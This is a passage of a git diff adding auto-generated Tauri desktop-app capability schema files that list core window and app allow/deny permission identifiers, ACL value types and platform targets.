set_overlay_icon command without any pre-configured scope." + }, + { + "description": "Enables the set_position command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-position", + "markdownDescription": "Enables the set_position command without any pre-configured scope." + }, + { + "description": "Enables the set_progress_bar command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-progress-bar", + "markdownDescription": "Enables the set_progress_bar command without any pre-configured scope." + }, + { + "description": "Enables the set_resizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-resizable", + "markdownDescription": "Enables the set_resizable command without any pre-configured scope." + }, + { + "description": "Enables the set_shadow command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-shadow", + "markdownDescription": "Enables the set_shadow command without any pre-configured scope." + }, + { + "description": "Enables the set_simple_fullscreen command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-simple-fullscreen", + "markdownDescription": "Enables the set_simple_fullscreen command without any pre-configured scope." + }, + { + "description": "Enables the set_size command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-size", + "markdownDescription": "Enables the set_size command without any pre-configured scope." + }, + { + "description": "Enables the set_size_constraints command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-size-constraints", + "markdownDescription": "Enables the set_size_constraints command without any pre-configured scope." + }, + { + "description": "Enables the set_skip_taskbar command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-skip-taskbar", + "markdownDescription": "Enables the set_skip_taskbar command without any pre-configured scope." + }, + { + "description": "Enables the set_theme command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-theme", + "markdownDescription": "Enables the set_theme command without any pre-configured scope." + }, + { + "description": "Enables the set_title command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-title", + "markdownDescription": "Enables the set_title command without any pre-configured scope." + }, + { + "description": "Enables the set_title_bar_style command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-title-bar-style", + "markdownDescription": "Enables the set_title_bar_style command without any pre-configured scope." + }, + { + "description": "Enables the set_visible_on_all_workspaces command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-visible-on-all-workspaces", + "markdownDescription": "Enables the set_visible_on_all_workspaces command without any pre-configured scope." + }, + { + "description": "Enables the show command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-show", + "markdownDescription": "Enables the show command without any pre-configured scope." + }, + { + "description": "Enables the start_dragging command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-start-dragging", + "markdownDescription": "Enables the start_dragging command without any pre-configured scope." + }, + { + "description": "Enables the start_resize_dragging command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-start-resize-dragging", + "markdownDescription": "Enables the start_resize_dragging command without any pre-configured scope." + }, + { + "description": "Enables the theme command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-theme", + "markdownDescription": "Enables the theme command without any pre-configured scope." + }, + { + "description": "Enables the title command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-title", + "markdownDescription": "Enables the title command without any pre-configured scope." + }, + { + "description": "Enables the toggle_maximize command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-toggle-maximize", + "markdownDescription": "Enables the toggle_maximize command without any pre-configured scope." + }, + { + "description": "Enables the unmaximize command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-unmaximize", + "markdownDescription": "Enables the unmaximize command without any pre-configured scope." + }, + { + "description": "Enables the unminimize command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-unminimize", + "markdownDescription": "Enables the unminimize command without any pre-configured scope." + }, + { + "description": "Denies the activity_name command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-activity-name", + "markdownDescription": "Denies the activity_name command without any pre-configured scope." + }, + { + "description": "Denies the available_monitors command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-available-monitors", + "markdownDescription": "Denies the available_monitors command without any pre-configured scope." + }, + { + "description": "Denies the center command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-center", + "markdownDescription": "Denies the center command without any pre-configured scope." + }, + { + "description": "Denies the close command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-close", + "markdownDescription": "Denies the close command without any pre-configured scope." + }, + { + "description": "Denies the create command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-create", + "markdownDescription": "Denies the create command without any pre-configured scope." + }, + { + "description": "Denies the current_monitor command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-current-monitor", + "markdownDescription": "Denies the current_monitor command without any pre-configured scope." + }, + { + "description": "Denies the cursor_position command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-cursor-position", + "markdownDescription": "Denies the cursor_position command without any pre-configured scope." + }, + { + "description": "Denies the destroy command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-destroy", + "markdownDescription": "Denies the destroy command without any pre-configured scope." + }, + { + "description": "Denies the get_all_windows command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-get-all-windows", + "markdownDescription": "Denies the get_all_windows command without any pre-configured scope." + }, + { + "description": "Denies the hide command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-hide", + "markdownDescription": "Denies the hide command without any pre-configured scope." + }, + { + "description": "Denies the inner_position command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-inner-position", + "markdownDescription": "Denies the inner_position command without any pre-configured scope." + }, + { + "description": "Denies the inner_size command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-inner-size", + "markdownDescription": "Denies the inner_size command without any pre-configured scope." + }, + { + "description": "Denies the internal_toggle_maximize command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-internal-toggle-maximize", + "markdownDescription": "Denies the internal_toggle_maximize command without any pre-configured scope." + }, + { + "description": "Denies the is_always_on_top command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-always-on-top", + "markdownDescription": "Denies the is_always_on_top command without any pre-configured scope." + }, + { + "description": "Denies the is_closable command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-closable", + "markdownDescription": "Denies the is_closable command without any pre-configured scope." + }, + { + "description": "Denies the is_decorated command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-decorated", + "markdownDescription": "Denies the is_decorated command without any pre-configured scope." + }, + { + "description": "Denies the is_enabled command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-enabled", + "markdownDescription": "Denies the is_enabled command without any pre-configured scope." + }, + { + "description": "Denies the is_focused command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-focused", + "markdownDescription": "Denies the is_focused command without any pre-configured scope." + }, + { + "description": "Denies the is_fullscreen command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-fullscreen", + "markdownDescription": "Denies the is_fullscreen command without any pre-configured scope." + }, + { + "description": "Denies the is_maximizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-maximizable", + "markdownDescription": "Denies the is_maximizable command without any pre-configured scope." + }, + { + "description": "Denies the is_maximized command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-maximized", + "markdownDescription": "Denies the is_maximized command without any pre-configured scope." + }, + { + "description": "Denies the is_minimizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-minimizable", + "markdownDescription": "Denies the is_minimizable command without any pre-configured scope." + }, + { + "description": "Denies the is_minimized command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-minimized", + "markdownDescription": "Denies the is_minimized command without any pre-configured scope." + }, + { + "description": "Denies the is_resizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-resizable", + "markdownDescription": "Denies the is_resizable command without any pre-configured scope." + }, + { + "description": "Denies the is_visible command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-visible", + "markdownDescription": "Denies the is_visible command without any pre-configured scope." + }, + { + "description": "Denies the maximize command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-maximize", + "markdownDescription": "Denies the maximize command without any pre-configured scope." + }, + { + "description": "Denies the minimize command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-minimize", + "markdownDescription": "Denies the minimize command without any pre-configured scope." + }, + { + "description": "Denies the monitor_from_point command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-monitor-from-point", + "markdownDescription": "Denies the monitor_from_point command without any pre-configured scope." + }, + { + "description": "Denies the outer_position command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-outer-position", + "markdownDescription": "Denies the outer_position command without any pre-configured scope." + }, + { + "description": "Denies the outer_size command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-outer-size", + "markdownDescription": "Denies the outer_size command without any pre-configured scope." + }, + { + "description": "Denies the primary_monitor command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-primary-monitor", + "markdownDescription": "Denies the primary_monitor command without any pre-configured scope." + }, + { + "description": "Denies the request_user_attention command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-request-user-attention", + "markdownDescription": "Denies the request_user_attention command without any pre-configured scope." + }, + { + "description": "Denies the scale_factor command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-scale-factor", + "markdownDescription": "Denies the scale_factor command without any pre-configured scope." + }, + { + "description": "Denies the scene_identifier command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-scene-identifier", + "markdownDescription": "Denies the scene_identifier command without any pre-configured scope." + }, + { + "description": "Denies the set_always_on_bottom command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-always-on-bottom", + "markdownDescription": "Denies the set_always_on_bottom command without any pre-configured scope." + }, + { + "description": "Denies the set_always_on_top command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-always-on-top", + "markdownDescription": "Denies the set_always_on_top command without any pre-configured scope." + }, + { + "description": "Denies the set_background_color command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-background-color", + "markdownDescription": "Denies the set_background_color command without any pre-configured scope." + }, + { + "description": "Denies the set_badge_count command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-badge-count", + "markdownDescription": "Denies the set_badge_count command without any pre-configured scope." + }, + { + "description": "Denies the set_badge_label command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-badge-label", + "markdownDescription": "Denies the set_badge_label command without any pre-configured scope." + }, + { + "description": "Denies the set_closable command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-closable", + "markdownDescription": "Denies the set_closable command without any pre-configured scope." + }, + { + "description": "Denies the set_content_protected command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-content-protected", + "markdownDescription": "Denies the set_content_protected command without any pre-configured scope." + }, + { + "description": "Denies the set_cursor_grab command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-cursor-grab", + "markdownDescription": "Denies the set_cursor_grab command without any pre-configured scope." + }, + { + "description": "Denies the set_cursor_icon command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-cursor-icon", + "markdownDescription": "Denies the set_cursor_icon command without any pre-configured scope." + }, + { + "description": "Denies the set_cursor_position command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-cursor-position", + "markdownDescription": "Denies the set_cursor_position command without any pre-configured scope." + }, + { + "description": "Denies the set_cursor_visible command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-cursor-visible", + "markdownDescription": "Denies the set_cursor_visible command without any pre-configured scope." + }, + { + "description": "Denies the set_decorations command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-decorations", + "markdownDescription": "Denies the set_decorations command without any pre-configured scope." + }, + { + "description": "Denies the set_effects command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-effects", + "markdownDescription": "Denies the set_effects command without any pre-configured scope." + }, + { + "description": "Denies the set_enabled command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-enabled", + "markdownDescription": "Denies the set_enabled command without any pre-configured scope." + }, + { + "description": "Denies the set_focus command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-focus", + "markdownDescription": "Denies the set_focus command without any pre-configured scope." + }, + { + "description": "Denies the set_focusable command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-focusable", + "markdownDescription": "Denies the set_focusable command without any pre-configured scope." + }, + { + "description": "Denies the set_fullscreen command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-fullscreen", + "markdownDescription": "Denies the set_fullscreen command without any pre-configured scope." + }, + { + "description": "Denies the set_icon command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-icon", + "markdownDescription": "Denies the set_icon command without any pre-configured scope." + }, + { + "description": "Denies the set_ignore_cursor_events command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-ignore-cursor-events", + "markdownDescription": "Denies the set_ignore_cursor_events command without any pre-configured scope." + }, + { + "description": "Denies the set_max_size command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-max-size", + "markdownDescription": "Denies the set_max_size command without any pre-configured scope." + }, + { + "description": "Denies the set_maximizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-maximizable", + "markdownDescription": "Denies the set_maximizable command without any pre-configured scope." + }, + { + "description": "Denies the set_min_size command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-min-size", + "markdownDescription": "Denies the set_min_size command without any pre-configured scope." + }, + { + "description": "Denies the set_minimizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-minimizable", + "markdownDescription": "Denies the set_minimizable command without any pre-configured scope." + }, + { + "description": "Denies the set_overlay_icon command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-overlay-icon", + "markdownDescription": "Denies the set_overlay_icon command without any pre-configured scope." + }, + { + "description": "Denies the set_position command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-position", + "markdownDescription": "Denies the set_position command without any pre-configured scope." + }, + { + "description": "Denies the set_progress_bar command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-progress-bar", + "markdownDescription": "Denies the set_progress_bar command without any pre-configured scope." + }, + { + "description": "Denies the set_resizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-resizable", + "markdownDescription": "Denies the set_resizable command without any pre-configured scope." + }, + { + "description": "Denies the set_shadow command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-shadow", + "markdownDescription": "Denies the set_shadow command without any pre-configured scope." + }, + { + "description": "Denies the set_simple_fullscreen command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-simple-fullscreen", + "markdownDescription": "Denies the set_simple_fullscreen command without any pre-configured scope." + }, + { + "description": "Denies the set_size command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-size", + "markdownDescription": "Denies the set_size command without any pre-configured scope." + }, + { + "description": "Denies the set_size_constraints command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-size-constraints", + "markdownDescription": "Denies the set_size_constraints command without any pre-configured scope." + }, + { + "description": "Denies the set_skip_taskbar command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-skip-taskbar", + "markdownDescription": "Denies the set_skip_taskbar command without any pre-configured scope." + }, + { + "description": "Denies the set_theme command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-theme", + "markdownDescription": "Denies the set_theme command without any pre-configured scope." + }, + { + "description": "Denies the set_title command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-title", + "markdownDescription": "Denies the set_title command without any pre-configured scope." + }, + { + "description": "Denies the set_title_bar_style command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-title-bar-style", + "markdownDescription": "Denies the set_title_bar_style command without any pre-configured scope." + }, + { + "description": "Denies the set_visible_on_all_workspaces command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-visible-on-all-workspaces", + "markdownDescription": "Denies the set_visible_on_all_workspaces command without any pre-configured scope." + }, + { + "description": "Denies the show command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-show", + "markdownDescription": "Denies the show command without any pre-configured scope." + }, + { + "description": "Denies the start_dragging command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-start-dragging", + "markdownDescription": "Denies the start_dragging command without any pre-configured scope." + }, + { + "description": "Denies the start_resize_dragging command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-start-resize-dragging", + "markdownDescription": "Denies the start_resize_dragging command without any pre-configured scope." + }, + { + "description": "Denies the theme command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-theme", + "markdownDescription": "Denies the theme command without any pre-configured scope." + }, + { + "description": "Denies the title command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-title", + "markdownDescription": "Denies the title command without any pre-configured scope." + }, + { + "description": "Denies the toggle_maximize command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-toggle-maximize", + "markdownDescription": "Denies the toggle_maximize command without any pre-configured scope." + }, + { + "description": "Denies the unmaximize command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-unmaximize", + "markdownDescription": "Denies the unmaximize command without any pre-configured scope." + }, + { + "description": "Denies the unminimize command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-unminimize", + "markdownDescription": "Denies the unminimize command without any pre-configured scope." + } + ] + }, + "Value": { + "description": "All supported ACL values.", + "anyOf": [ + { + "description": "Represents a null JSON value.", + "type": "null" + }, + { + "description": "Represents a [`bool`].", + "type": "boolean" + }, + { + "description": "Represents a valid ACL [`Number`].", + "allOf": [ + { + "$ref": "#/definitions/Number" + } + ] + }, + { + "description": "Represents a [`String`].", + "type": "string" + }, + { + "description": "Represents a list of other [`Value`]s.", + "type": "array", + "items": { + "$ref": "#/definitions/Value" + } + }, + { + "description": "Represents a map of [`String`] keys to [`Value`]s.", + "type": "object", + "additionalProperties": { + "$ref": "#/definitions/Value" + } + } + ] + }, + "Number": { + "description": "A valid ACL number.", + "anyOf": [ + { + "description": "Represents an [`i64`].", + "type": "integer", + "format": "int64" + }, + { + "description": "Represents a [`f64`].", + "type": "number", + "format": "double" + } + ] + }, + "Target": { + "description": "Platform target.", + "oneOf": [ + { + "description": "MacOS.", + "type": "string", + "enum": [ + "macOS" + ] + }, + { + "description": "Windows.", + "type": "string", + "enum": [ + "windows" + ] + }, + { + "description": "Linux.", + "type": "string", + "enum": [ + "linux" + ] + }, + { + "description": "Android.", + "type": "string", + "enum": [ + "android" + ] + }, + { + "description": "iOS.", + "type": "string", + "enum": [ + "iOS" + ] + } + ] + } + } +} \ No newline at end of file diff --git a/ui/src-tauri/gen/schemas/windows-schema.json b/ui/src-tauri/gen/schemas/windows-schema.json new file mode 100644 index 0000000..3286645 --- /dev/null +++ b/ui/src-tauri/gen/schemas/windows-schema.json @@ -0,0 +1,2292 @@ +{ + "$schema": "http://json-schema.org/draft-07/schema#", + "title": "CapabilityFile", + "description": "Capability formats accepted in a capability file.", + "anyOf": [ + { + "description": "A single capability.", + "allOf": [ + { + "$ref": "#/definitions/Capability" + } + ] + }, + { + "description": "A list of capabilities.", + "type": "array", + "items": { + "$ref": "#/definitions/Capability" + } + }, + { + "description": "A list of capabilities.", + "type": "object", + "required": [ + "capabilities" + ], + "properties": { + "capabilities": { + "description": "The list of capabilities.", + "type": "array", + "items": { + "$ref": "#/definitions/Capability" + } + } + } + } + ], + "definitions": { + "Capability": { + "description": "A grouping and boundary mechanism developers can use to isolate access to the IPC layer.\n\nIt controls application windows' and webviews' fine grained access to the Tauri core, application, or plugin commands. If a webview or its window is not matching any capability then it has no access to the IPC layer at all.\n\nThis can be done to create groups of windows, based on their required system access, which can reduce impact of frontend vulnerabilities in less privileged windows. Windows can be added to a capability by exact name (e.g. `main-window`) or glob patterns like `*` or `admin-*`. A Window can have none, one, or multiple associated capabilities.\n\n## Example\n\n```json { \"identifier\": \"main-user-files-write\", \"description\": \"This capability allows the `main` window on macOS and Windows access to `filesystem` write related commands and `dialog` commands to enable programmatic access to files selected by the user.\", \"windows\": [ \"main\" ], \"permissions\": [ \"core:default\", \"dialog:open\", { \"identifier\": \"fs:allow-write-text-file\", \"allow\": [{ \"path\": \"$HOME/test.txt\" }] }, ], \"platforms\": [\"macOS\",\"windows\"] } ```", + "type": "object", + "required": [ + "identifier", + "permissions" + ], + "properties": { + "identifier": { + "description": "Identifier of the capability.\n\n## Example\n\n`main-user-files-write`", + "type": "string" + }, + "description": { + "description": "Description of what the capability is intended to allow on associated windows.\n\nIt should contain a description of what the grouped permissions should allow.\n\n## Example\n\nThis capability allows the `main` window access to `filesystem` write related commands and `dialog` commands to enable programmatic access to files selected by the user.", + "default": "", + "type": "string" + }, + "remote": { + "description": "Configure remote URLs that can use the capability permissions.\n\nThis setting is optional and defaults to not being set, as our default use case is that the content is served from our local application.\n\n:::caution Make sure you understand the security implications of providing remote sources with local system access. :::\n\n## Example\n\n```json { \"urls\": [\"https://*.mydomain.dev\"] } ```", + "anyOf": [ + { + "$ref": "#/definitions/CapabilityRemote" + }, + { + "type": "null" + } + ] + }, + "local": { + "description": "Whether this capability is enabled for local app URLs or not. Defaults to `true`.", + "default": true, + "type": "boolean" + }, + "windows": { + "description": "List of windows that are affected by this capability. Can be a glob pattern.\n\nIf a window label matches any of the patterns in this list, the capability will be enabled on all the webviews of that window, regardless of the value of [`Self::webviews`].\n\nOn multiwebview windows, prefer specifying [`Self::webviews`] and omitting [`Self::windows`] for a fine grained access control.\n\n## Example\n\n`[\"main\"]`", + "type": "array", + "items": { + "type": "string" + } + }, + "webviews": { + "description": "List of webviews that are affected by this capability. Can be a glob pattern.\n\nThe capability will be enabled on all the webviews whose label matches any of the patterns in this list, regardless of whether the webview's window label matches a pattern in [`Self::windows`].\n\n## Example\n\n`[\"sub-webview-one\", \"sub-webview-two\"]`", + "type": "array", + "items": { + "type": "string" + } + }, + "permissions": { + "description": "List of permissions attached to this capability.\n\nMust include the plugin name as prefix in the form of `${plugin-name}:${permission-name}`. For commands directly implemented in the application itself only `${permission-name}` is required.\n\n## Example\n\n```json [ \"core:default\", \"shell:allow-open\", \"dialog:open\", { \"identifier\": \"fs:allow-write-text-file\", \"allow\": [{ \"path\": \"$HOME/test.txt\" }] } ] ```", + "type": "array", + "items": { + "$ref": "#/definitions/PermissionEntry" + }, + "uniqueItems": true + }, + "platforms": { + "description": "Limit which target platforms this capability applies to.\n\nBy default all platforms are targeted.\n\n## Example\n\n`[\"macOS\",\"windows\"]`", + "type": [ + "array", + "null" + ], + "items": { + "$ref": "#/definitions/Target" + } + } + } + }, + "CapabilityRemote": { + "description": "Configuration for remote URLs that are associated with the capability.", + "type": "object", + "required": [ + "urls" + ], + "properties": { + "urls": { + "description": "Remote domains this capability refers to using the [URLPattern standard](https://urlpattern.spec.whatwg.org/).\n\n## Examples\n\n- \"https://*.mydomain.dev\": allows subdomains of mydomain.dev - \"https://mydomain.dev/api/*\": allows any subpath of mydomain.dev/api", + "type": "array", + "items": { + "type": "string" + } + } + } + }, + "PermissionEntry": { + "description": "An entry for a permission value in a [`Capability`] can be either a raw permission [`Identifier`] or an object that references a permission and extends its scope.", + "anyOf": [ + { + "description": "Reference a permission or permission set by identifier.", + "allOf": [ + { + "$ref": "#/definitions/Identifier" + } + ] + }, + { + "description": "Reference a permission or permission set by identifier and extends its scope.", + "type": "object", + "allOf": [ + { + "properties": { + "identifier": { + "description": "Identifier of the permission or permission set.", + "allOf": [ + { + "$ref": "#/definitions/Identifier" + } + ] + }, + "allow": { + "description": "Data that defines what is allowed by the scope.", + "type": [ + "array", + "null" + ], + "items": { + "$ref": "#/definitions/Value" + } + }, + "deny": { + "description": "Data that defines what is denied by the scope. This should be prioritized by validation logic.", + "type": [ + "array", + "null" + ], + "items": { + "$ref": "#/definitions/Value" + } + } + } + } + ], + "required": [ + "identifier" + ] + } + ] + }, + "Identifier": { + "description": "Permission identifier", + "oneOf": [ + { + "description": "Default core plugins set.\n#### This default permission set includes:\n\n- `core:path:default`\n- `core:event:default`\n- `core:window:default`\n- `core:webview:default`\n- `core:app:default`\n- `core:image:default`\n- `core:resources:default`\n- `core:menu:default`\n- `core:tray:default`", + "type": "string", + "const": "core:default", + "markdownDescription": "Default core plugins set.\n#### This default permission set includes:\n\n- `core:path:default`\n- `core:event:default`\n- `core:window:default`\n- `core:webview:default`\n- `core:app:default`\n- `core:image:default`\n- `core:resources:default`\n- `core:menu:default`\n- `core:tray:default`" + }, + { + "description": "Default permissions for the plugin.\n#### This default permission set includes:\n\n- `allow-version`\n- `allow-name`\n- `allow-tauri-version`\n- `allow-identifier`\n- `allow-bundle-type`\n- `allow-register-listener`\n- `allow-remove-listener`\n- `allow-supports-multiple-windows`", + "type": "string", + "const": "core:app:default", + "markdownDescription": "Default permissions for the plugin.\n#### This default permission set includes:\n\n- `allow-version`\n- `allow-name`\n- `allow-tauri-version`\n- `allow-identifier`\n- `allow-bundle-type`\n- `allow-register-listener`\n- `allow-remove-listener`\n- `allow-supports-multiple-windows`" + }, + { + "description": "Enables the app_hide command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-app-hide", + "markdownDescription": "Enables the app_hide command without any pre-configured scope." + }, + { + "description": "Enables the app_show command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-app-show", + "markdownDescription": "Enables the app_show command without any pre-configured scope." + }, + { + "description": "Enables the bundle_type command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-bundle-type", + "markdownDescription": "Enables the bundle_type command without any pre-configured scope." + }, + { + "description": "Enables the default_window_icon command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-default-window-icon", + "markdownDescription": "Enables the default_window_icon command without any pre-configured scope." + }, + { + "description": "Enables the fetch_data_store_identifiers command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-fetch-data-store-identifiers", + "markdownDescription": "Enables the fetch_data_store_identifiers command without any pre-configured scope." + }, + { + "description": "Enables the identifier command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-identifier", + "markdownDescription": "Enables the identifier command without any pre-configured scope." + }, + { + "description": "Enables the name command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-name", + "markdownDescription": "Enables the name command without any pre-configured scope." + }, + { + "description": "Enables the register_listener command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-register-listener", + "markdownDescription": "Enables the register_listener command without any pre-configured scope." + }, + { + "description": "Enables the remove_data_store command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-remove-data-store", + "markdownDescription": "Enables the remove_data_store command without any pre-configured scope." + }, + { + "description": "Enables the remove_listener command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-remove-listener", + "markdownDescription": "Enables the remove_listener command without any pre-configured scope." + }, + { + "description": "Enables the set_app_theme command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-set-app-theme", + "markdownDescription": "Enables the set_app_theme command without any pre-configured scope." + }, + { + "description": "Enables the set_dock_visibility command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-set-dock-visibility", + "markdownDescription": "Enables the set_dock_visibility command without any pre-configured scope." + }, + { + "description": "Enables the supports_multiple_windows command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-supports-multiple-windows", + "markdownDescription": "Enables the supports_multiple_windows command without any pre-configured scope." + }, + { + "description": "Enables the tauri_version command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-tauri-version", + "markdownDescription": "Enables the tauri_version command without any pre-configured scope." + }, + { + "description": "Enables the version command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-version", + "markdownDescription": "Enables the version command without any pre-configured scope." + }, + { + "description": "Denies the app_hide command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-app-hide", + "markdownDescription": "Denies the app_hide command without any pre-configured scope." + }, + { + "description": "Denies the app_show command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-app-show", + "markdownDescription": "Denies the app_show command without any pre-configured scope." + }, + { + "description": "Denies the bundle_type command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-bundle-type", + "markdownDescription": "Denies the bundle_type command without any pre-configured scope." + }, + { + "description": "Denies the default_window_icon command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-default-window-icon", + "markdownDescription": "Denies the default_window_icon command without any pre-configured scope." + }, + { + "description": "Denies the fetch_data_store_identifiers command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-fetch-data-store-identifiers", + "markdownDescription": "Denies the fetch_data_store_identifiers command without any pre-configured scope." + }, + { + "description": "Denies the identifier command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-identifier", + "markdownDescription": "Denies the identifier command without any pre-configured scope." + }, + { + "description": "Denies the name command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-name", + "markdownDescription": "Denies the name command without any pre-configured scope." + }, + { + "description": "Denies the register_listener command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-register-listener", + "markdownDescription": "Denies the register_listener command without any pre-configured scope." + }, + { + "description": "Denies the remove_data_store command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-remove-data-store", + "markdownDescription": "Denies the remove_data_store command without any pre-configured scope." + }, + { + "description": "Denies the remove_listener command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-remove-listener", + "markdownDescription": "Denies the remove_listener command without any pre-configured scope." + }, + { + "description": "Denies the set_app_theme command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-set-app-theme", + "markdownDescription": "Denies the set_app_theme command without any pre-configured scope." + }, + { + "description": "Denies the set_dock_visibility command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-set-dock-visibility", + "markdownDescription": "Denies the set_dock_visibility command without any pre-configured scope." + }, + { + "description": "Denies the supports_multiple_windows command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-supports-multiple-windows", + "markdownDescription": "Denies the supports_multiple_windows command without any pre-configured scope." + }, + { + "description": "Denies the tauri_version command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-tauri-version", + "markdownDescription": "Denies the tauri_version command without any pre-configured scope." + }, + { + "description": "Denies the version command without any pre-configured scope.", + "type": "string", + 